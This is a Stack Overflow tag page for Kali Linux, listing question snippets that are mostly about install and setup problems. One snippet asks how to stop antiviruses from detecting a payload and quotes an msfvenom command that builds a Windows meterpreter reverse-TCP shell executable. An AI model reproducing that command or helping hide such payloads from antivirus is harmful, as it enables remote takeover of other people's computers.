Questions tagged [kali-linux]

Kali Linux is a special-purpose Linux distribution for penetration testing and security auditing, based on Debian. KALI LINUX QUESTIONS ON STACK OVERFLOW MUST BE PROGRAMMING RELATED. Questions about problems getting something to work on Kali, why Kali is so different from other Linux distributions, etc., are generally off-topic for Stack Overflow.

Kali Linux is a special-purpose Linux distribution for penetration testing and security auditing, based on Debian.

Nearly all questions about Kali are considered off-topic not only on Stack Overflow, but on its sister sites (e.g. Server Fault, Super User, Unix and Linux Stack Exchange). For more information about why we have this policy, please read the following FAQ: Why is Kali Linux so hard to set up? Why won't people help me?

275 questions
-3
votes
2 answers

uninstall postgresql-10 in kali linux

Im have problem postgresql-10 in kali linux │ │ The PostgreSQL version 10 is obsolete, but the server or client packages │ are still installed. Please install the…
-3
votes
1 answer

another web server is already running and unable to run Apache2

I am using Kali linux I am unable to run Apache2, i tried so many ways to fix it .., i successful installed xampp and apache2 but dont know why apache not running, mysql and proFTD is running When i run code to to check the status of apache in…
AFAQUE JAYA
  • 31
  • 1
  • 13
-3
votes
1 answer

How to install wingide

I'm trying to install wingide on a Kali Linux virtual Machine. I have downloaded the ide directly from the website, then put this code into the terminal: dpkg -i wingide6_6.1.4-1_amd64.deb After loading, it says exactly this: dependency problems…
Jacchegia
  • 24
  • 3
-4
votes
0 answers

I need support with kali Linux

Im trying to download Tool-X but no matter what I do I cannot get it to open or even install does anyone know how to solve this? I started by downloading it and updated apt and installed git but when i run install.aex it does install it but it makes…
-4
votes
0 answers

Hello everyone, I have a problem my payload detected by antiviruses

Hello antiviruses are detected my payload, I found a solution on YouTube video, but it doesn't work for me. commmands systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.000.000 LPORT=4445 -f exe -e…
-4
votes
1 answer

How do I install/run Hipku using Linux (links in the details)

I received a hacker challenge gift for Christmas. I'm no hacker, nor do I work in an IT role, but I'm trying my best. I've got a haiku: The weary red dove fights in the empty tundra. Jasmine petals dance. I need to convert this into an IP. I'm…
Luke
  • 1
  • 1
-4
votes
1 answer

Usage of Reverse Engineering/Rebuilding an APK

Recently I've been trying apktool but I wonder what is the use of reverse engineering/rebuilding an APK with a tool like apktool? I've already searched it but I didn't find the answer
VZNRRO
  • 3
  • 1
-4
votes
1 answer

Remove the main domain from a list of subdomains

How to remove the main domain from a list of subdomains for example if i have a file contains www.example.com sub.examle.com sub2.example.com examle.com.ar example.com I want to extract only sub.example.com sub2.example.com I try grep -v…
-4
votes
1 answer

wingIDE not working on kali linux no error message

there is no error message it just does not open no matter how long i wait i have the icon ready i depackaged everything but had to force install it and it does not work. message after install ANY HELP WILL BE APPRECIATED THANKS
kkplo
  • 1
-4
votes
1 answer

Kali Linux Installing Bluto

Could somebody help me with the following problem? It would be much appreciated. Goal : To install Bluto on Kali Linux 2020.1 using sudo pip install bluto command Problem : Install does not complete Error message: ERROR: Command errored out with…
flex891
  • 1
  • 1
  • 2
-5
votes
1 answer

Error while installing Atom in Kali Linux

I was trying to install Atom in Kali Linux Live. And after command dpkg -i ~/Downloads/atom-amd64.deb I get error dpkg: error: cannot access archive '/root/Downloads/atom-amd64.deb': No such file or directory I have tried as both root and non-root…
Pragyan
  • 349
  • 2
  • 14
-5
votes
1 answer

Trouble installing NodeJS on Kali Linux docker image

I am trying to create a docker image based on the Kali Linux base image, and I need to install NodeJS as a dependency for my application. Here's my Dockerfile: FROM kalilinux/kali-linux-docker RUN apt-get update -y && \ apt-get dist-upgrade -y…
arthurakay
  • 5,631
  • 8
  • 37
  • 62
-5
votes
1 answer

Kali Linux Rolling: Trying to install Ruby 2.2.2 but getting "__rvm_make -j4" error

I'm pretty new to Linux systems and running Kali lite but I am trying to install Hashview and as per instructions, I have donwloaded RVM and the default version 2.4.0p0 is installed but I need 2.2.2 to match with the GEM file. When I attempt to…
-7
votes
2 answers

Cannot install pyV8 and pylibemu in kali

My first post here! After searching and trying and failing for several weeks, here I am. Thank you for your insights on this issue. Part of my job requires investigating and blacklisting spam/phishing sites, as well as analysis of suspect PDF files.…
1 2 3
17
18